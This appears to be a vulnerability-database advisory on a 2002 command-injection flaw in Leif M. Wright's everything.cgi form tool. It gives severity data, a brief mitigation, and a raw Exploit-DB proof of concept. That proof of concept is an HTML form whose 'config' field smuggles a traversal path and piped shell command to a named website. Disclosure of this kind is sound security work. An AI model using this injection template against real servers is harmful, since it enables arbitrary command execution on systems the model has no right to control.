An input validation vulnerability in Leif M. Wright's everything.cgi

vendor:

everything.cgi

by:

Leif M. Wright

7.5

CVSS

HIGH

Command Injection

CWE

Product Name: everything.cgi

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2002

An input validation vulnerability in Leif M. Wright’s everything.cgi

The script fails to properly filter shell commands from user-supplied input to the 'config' field, allowing an attacker to run arbitrary shell commands with the privilege of the web server. An example exploit is provided in the text.

Mitigation:

Input validation should be performed to ensure that user-supplied input does not contain malicious commands.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/2101/info

An input validation vulnerability exists in Leif M. Wright's everything.cgi, a Perl-based form design tool.

The script fails to properly filter shell commands from user-supplied input to the 'config' field.

As a result, the script can be made to run arbitrary shell commands with the privilege of the web server.

<form action="http://www.conservatives.net/someplace/everythingform.cgi"
method=POST>
<h1>everythingform.cgi exploit</h1>
Command: <input type=text name=config value="../../../../../../../../bin/ping
-c 5 www.foobar.com|">
<input type=hidden name=Name value="expletive deleted">
<input type=hidden name="e-mail" value="foo@bar.net">
<input type=hidden name=FavoriteColor value=Black>
<input type=submit value=run>
</form>